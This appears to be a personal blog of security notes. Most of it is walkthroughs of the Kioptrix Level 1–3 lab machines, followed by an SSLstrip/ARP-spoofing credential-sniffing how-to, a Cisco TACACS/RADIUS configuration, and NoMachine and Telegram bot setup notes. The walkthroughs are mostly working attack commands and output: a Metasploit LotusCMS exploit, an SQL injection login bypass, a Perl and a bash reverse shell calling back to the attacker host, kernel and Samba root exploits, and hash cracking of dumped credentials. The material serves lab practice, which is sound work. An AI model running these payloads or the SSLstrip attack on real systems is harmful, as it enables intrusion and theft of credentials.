Kioptrix Level 3

Kioptrix Level 2

netdiscover -r 123.123.123.0/24
123.123.123.107 00:0c:29:d7:ef:9f      1      60  VMware, Inc.

nmap -T4 -A -v 123.123.123.107
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:D7:EF:9F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.002 days (since Wed Oct  3 18:02:38 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


http://123.123.123.107/

msf > search lotuscms

Matching Modules
================

   Name                              Disclosure Date  Rank       Description
   ----                              ---------------  ----       -----------
   exploit/multi/http/lcms_php_exec  2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution


msf >


msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(lcms_php_exec) >

msf exploit(lcms_php_exec) > set rhost 123.123.123.107
rhost => 123.123.123.107
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set lhost 123.123.123.201
lhost => 123.123.123.201
msf exploit(lcms_php_exec) > set URI /
URI => /

msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    123.123.123.107  yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  123.123.123.201  yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0



msf exploit(lcms_php_exec) > exploit

[*] Started reverse TCP handler on 123.123.123.201:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (123.123.123.201:4444 -> 123.123.123.107:57090) at 2018-10-03 23:37:34 +0700


id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


echo "import pty; pty.spawn('/bin/bash')" > /tmp/vnkk.py
python /tmp/vnkk.py
www-data@Kioptrix3:/home/www/kioptrix3.com$

www-data@Kioptrix3:/home/www/kioptrix3.com$

www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat /home/www/kioptrix3.com/gallery/gconfig.php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}

}
}

?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$




http://123.123.123.107/phpmyadmin/
User: root
Password: fuckeyou

1 dreg 0d3eccfb887aabd50f243b3f155c0f85

2 loneferret 5badcaf789d3d1d09794d8f021f40f0e



vim md5.txt
0d3eccfb887aabd50f243b3f155c0f85
5badcaf789d3d1d09794d8f021f40f0e
hashcat -m 0 md5.txt /usr/share/wordlists/rockyou.txt

5badcaf789d3d1d09794d8f021f40f0e:starwars
             
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

Kioptrix Level 2

Kioptrix Level 2
netdiscover -r 123.123.123.0/24

123.123.123.101 00:0c:29:9c:4b:ac      1      60  VMware, Inc.

nmap -T4 -A -v 123.123.123.101

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            655/udp  status
|_  100024  1            658/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2018-10-01T18:52:15+00:00; +10h50m06s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:9C:4B:AC (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 - 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Uptime guess: 49.709 days (since Sun Aug 12 22:01:26 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: 10h50m05s, deviation: 0s, median: 10h50m05s


http://123.123.123.101/

The Remote System Administration Login webpage was been tested for SQL injection attacks and it was found out that using 1' or '1' = '1 as the username and password


1' or '1' = '1


After login, we try with command injection:


;perl -e 'use Socket;$i="123.123.123.201";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

root@KaliLNX:/opt/VMs/Kioptrix_Level_2# nc -nlvp 443
listening on [any] 443 ...

connect to [123.123.123.201] from (UNKNOWN) [123.123.123.101] 32770
bash: no job control in this shell
bash-3.00$ bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$


cd /tmp


gcc -Wall -o linux-sendpage 9545.c
bash-3.00$ gcc -Wall -o linux-sendpage 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls -l
total 28
-rw-r--r--  1 apache apache 9783 Sep 26 04:36 9545.c
-rwxr-xr-x  1 apache apache 6762 Sep 25 21:24 e
-rwxr-xr-x  1 apache apache 6762 Oct  1 15:16 linux-sendpage
bash-3.00$

./linux-sendpage
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#

Kioptrix Level 1

Kioptrix Level 1
root@KaliLNX:~# netdiscover -r 123.123.123.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                             
                                                                                                                                                                                           
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                                                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname   
 -----------------------------------------------------------------------------                                                                       
 123.123.123.100 00:0c:29:d5:d9:e9      1      60  VMware,Inc.     

 nmap -T4 -A -v 123.123.123.100

 PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: VMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-10-01T21:16:49+00:00; +14h01m47s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:D5:D9:E9 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Mon Oct  1 14:12:01 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros


Let attack: 139/tcp  open  netbios-ssn Samba smbd (workgroup: VMYGROUP)


/usr/share/exploitdb/platforms/

searchsploit samba |grep 2.2
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution    multiple/remote/10.c

cp /usr/share/exploitdb/platforms/multiple/remote/10.c .
gcc 10.c -o samba-2.2.1a-exploit
root@KaliLNX:/opt/VMs/Kioptrix_Level_1# ./samba-exploit
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./samba-exploit [-bBcCdfprsStv] [host]

-b    bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B        bruteforce steps (default = 300)
-c connectback ip address
-C max childs for scan/bruteforce mode (default = 40)
-d       bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p        port to attack (default = 139)
-r         return address
-s              scan mode (random)
-S     scan mode
-t        presets (0 for a list)
-v              verbose mode



root@KaliLNX:/opt/VMs/Kioptrix_Level_1# ./samba-2.2.1a-exploit -b 0 123.123.123.100
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)


* On our Kali:
nc -nlvp 4444

* On our victime shell
bash -i >& /dev/tcp/123.123.123.201/4444 0>&1

* Go back to our Kali:
root@KaliLNX:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [123.123.123.201] from (UNKNOWN) [123.123.123.100] 1025
bash: no job control in this shell
[root@kioptrix tmp]#

[root@kioptrix tmp]#

[root@kioptrix tmp]# pwd
pwd
/tmp
[root@kioptrix tmp]# ls -la
ls -la
total 2
drwxrwxrwt    2 root     root         1024 Oct  1 17:29 .
drwxr-xr-x   19 root     root         1024 Oct  1 17:13 ..
[root@kioptrix tmp]#

Configure Authentication With TACACS and Radius

Configure Authentication With TACACS and Radius

Diagram

1. On PC

2. On Server TACACS+

3. On Server Radius

4. On Router, R1

configure terminal

hostname R1

interface GigabitEthernet0/0

ip address 192.168.2.1 255.255.255.0

no sh

interface GigabitEthernet0/1

ip address 192.168.1.1 255.255.255.0

no sh

ip domain-name cisco.com

username admin pass cisco

crypto key generate rsa 

1024

enable secret cisco

line vty 0 4

login authentication AUTH

transport input ssh

privilege level 15

aaa new-model

aaa authentication login AUTH group tacacs+ group radius local

tacacs-server host 192.168.1.2

tacacs-server key TACACS123

radius-server host 192.168.1.3

radius-server key RADIUS123

SSL Strip

SSL Strip

Diagram:

On KALI Machine

* Open a Terminal
netdiscover

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j  REDIRECT --to-port 8080

arpspoof -i eth0 -t 10.10.1.55 -r 10.10.1.111

* Open another Terminal
sslstrip -l 8080

Once the Victim Machine access to any login website such as, Facebook, Gmail, Yahoo, we will be able to see the login name and password that store on the file sslstrip.log on Kali.

* Open another Terminal
cat sslstrip.log to see the name and password.

Install NoMachine

Install NoMachine

Install NoMachine remote desktop to Kali.

1. On Window PC
Download and install NoMachine
https://www.nomachine.com/download/download&id=17


2. On KALI
Downlaod and install NoMachine
cd ~/Downloads
https://www.nomachine.com/download/download&id=3

dpkg -i nomachine_5.2.11_1_amd64.deb

3. Start NoMachine
Start NoMachine on Windows PC and connect to Kali

Create Telegram Bot

Create Telegram Bot

1. Search: BotFather (@BotFather)
/newbot

vnkk001_bot

After create the new bot we will got API similar the below format:
Use this token to access the HTTP API:
1122334455:AAbbCCddEEff1122334455

/setdescription

/setjointgroups

Check the API Info:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/getme

Check the API Chat:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/getupdates

Chat from Broswer:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/sendmessage?chat_id=154066828&text=TestMSG001

Why need to have BOT?
You can create as many BOT as you want and make it work for you as our robot.

In my case I create one to alert me once something went wrong,
I integrated with Nagios with the bot API as mentions above.

1. Create new bot, I named it:  Nagios_Alert

2. Add bot to a group (what ever you want and add other member as you want to)

3. Integrated with Nagios, by send the message as bot user to post the message,

So all the members will see the message in the group.